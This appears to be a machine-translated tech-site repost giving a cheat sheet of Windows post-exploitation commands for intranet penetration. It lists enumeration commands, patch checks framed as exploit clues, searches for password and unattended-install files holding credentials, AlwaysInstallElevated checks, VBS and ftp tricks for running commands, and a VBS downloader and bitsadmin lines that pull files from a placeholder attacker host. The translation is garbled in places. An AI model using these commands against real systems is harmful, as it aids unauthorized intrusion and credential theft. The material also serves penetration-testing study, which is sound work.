Shulou(Shulou.com)06/01 Report--

What are the practical commands for the penetration of Windows intranet? in view of this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

This is not a penetration test guide, but a brief introduction of several practical orders for Windows intranet rights, for us and other rookies to learn and observe, but also hope Daniel to forgive the guidance.

1. Get operating system information

Identify the operating system name and version:

C:\ Users\ thel3l > systeminfo | findstr / B / C: "OS Name" / C: "OS Version" OS Name: Microsoft Windows 10 Pro OS Version: 10.0.14393 Ngo A Build 14393

Of course, in the Chinese system, you have to do this:

Systeminfo | findstr / B / C: "OS name" / C: "OS version"

Identify the system architecture:

C:\ Users\ thel3l > echo% PROCESSOR_ARCHITECTURE% AMD64

View all environment variables:

C:\ Users\ thel3l > SET USERNAME=thel3l USERPROFILE=C:\ Users\ thel3l * snip*

View a specific user information:

C:\ Users\ thel3l > net user thel3l User name thel3l * snip* The command completed successfully

two。 Get network information

View routing table information:

C:\ Users\ thel3l > route print

View ARP cache information:

C:\ Users\ thel3l > arp-A

View firewall rules:

C:\ Users\ thel3l > netstat-ano C:\ Users\ thel3l > netsh firewall show config C:\ Users\ thel3l > netsh firewall show state

3. Application and service information

View scheduled tasks:

C:\ Users\ thel3l > schtasks / QUERY / fo LIST / v

The command of the Chinese system, first adjust the GBK code to 437 American code:

Chcp 437

And then

Schtasks / QUERY / fo LIST / v

View the service process ID:

C:\ Users\ thel3l > tasklist / SVC

View the installation driver:

C:\ Users\ thel3l > DRIVERQUERY

View installer and version information (exploit clues):

C:\ Users\ thel3l > wmic product list brief

View service, process, and launcher information:

C:\ Users\ thel3l > wmic service list brief C:\ Users\ thel3l > wmic process list brief C:\ Users\ thel3l > wmic startup list brief

View the execution permissions of the .msi program:

C:\ Users\ thel3l > reg query HKCU\ SOFTWARE\ Policies\ Microsoft\ Windows\ Installer / v AlwaysInstallElevated C:\ Users\ thel3l > reg query HKLM\ SOFTWARE\ Policies\ Microsoft\ Windows\ Installer / v AlwaysInstallElevated

Check to see if setuid and setgid are set:

C:\ Users\ thel3l > reg query HKEY_Local_Machine\ System\ CurrentControlSet\ Services\ NfsSvr\ Parameters\ SafeSetUidGidBits

View the installation patch and time information:

C:\ Users\ thel3l > wmic qfe get Caption,Description,HotFixID,InstalledOn

View specific vulnerability patch information:

C:\ Users\ thel3l > wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr / C: "KBxxxxxxx"

4. Sensitive data and catalogs

Look for password files or other sensitive files:

C:\ Users\ thel3l > cd/ C:\ Users\ thel3l > dir / b password.txt s password.txt C:\ Users\ thel3l > dir / b thel3l s config.* C:\ Users\ thel3l > findstr / si password * .xml * .ini * .txt C:\ Users\ thel3l > findstr / si login * .xml * .ini * .txt

Unattended installation files:

These files usually contain password information for base64 mode. This type of file can be found on some large enterprise networks or GHO systems, and the location of the file is usually as follows:

C:\ sysprep.inf C:\ sysprep\ sysprep.xml C:\ Windows\ Panther\ Unattend\ Unattended.xml C:\ Windows\ Panther\ Unattended.xml

5. File system

You can view the current accessible directory or file permissions by calling the system preinstaller language, such as under python:

Import os; os.system ("cmd / c {command here}")

Use the copy con command to create a ftp execution session:

Example

C:\ Users\ thel3l > copy con ftp.bat # create a batch file named ftp.bat, enter the execution session name, press enter to the next line, then press CTRL+Z to end editing, and then press enter to exit the created file ftp > # execute the ftp command ftp >! {command} # e.g. -! dir or! ipconfig

Use the copy con command to create a VBS script file:

C:\ Users\ thel3l > copy con commandExec.vbs # create VBS script file Call WScript.CreateObject ("Wscript.Shell") .Run ("cmd / K {command}", 8, True) # VBS file content C:\ Users\ thel3l > commandExec.vbs # execute script file

Check that the folder is writable:

C:\ Users\ thel3l > dir / a-r-d / s / b

6. A useful file upload script

'downloadfile.vbs' Set your settings strFileURL = "http://{YOUR_IP}/{FILE_NAME.EXT}" strHDLocation =" c:\ {FILE_NAME.EXT} "'Fetch the file Set objXMLHTTP = CreateObject (" MSXML2.XMLHTTP ") objXMLHTTP.open" GET ", strFileURL False objXMLHTTP.send () If objXMLHTTP.Status = 200Then Set objADOStream = CreateObject ("ADODB.Stream") objADOStream.Open objADOStream.Type = 1 'adTypeBinary objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position = 0' Set the stream position to the start Set objFSO = Createobject ("Scripting.FileSystemObject") If objFSO.Fileexists (strHDLocation) Then objFSO.DeleteFile strHDLocation Set objFSO = Nothing objADOStream.SaveToFile strHDLocation objADOStream.Close Set objADOStream = Nothing End if Set objXMLHTTP = Nothing

The script is released by a community, and you can run it in the following ways:

C:\ Users\ thel3l > cscript.exe downloadfile.vbs

Bitsadmin command:

If your target system is Windows 7 or above, you can use the bitsadmin command, bitsadmin is a command-line tool that can be used to create download and upload processes:

Example

C:\ Users\ thel3l > bitsadmin / transfer job_name / download / priority priority URL local\ path\ file C:\ Users\ thel3l > bitsadmin / transfer mydownloadjob / download / priority normal ^ http://{YOUR_IP}/{FILE_NAME.EXT} C:\ Users\ username\ Downloads\ {FILE_NAME.EXT}

Such as:

Bitsadmin / transfer n http://download.fb.com/file/xx.zip c:\ pentest\ xx.zip this is the answer to the question about the practical command of Windows intranet penetration. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.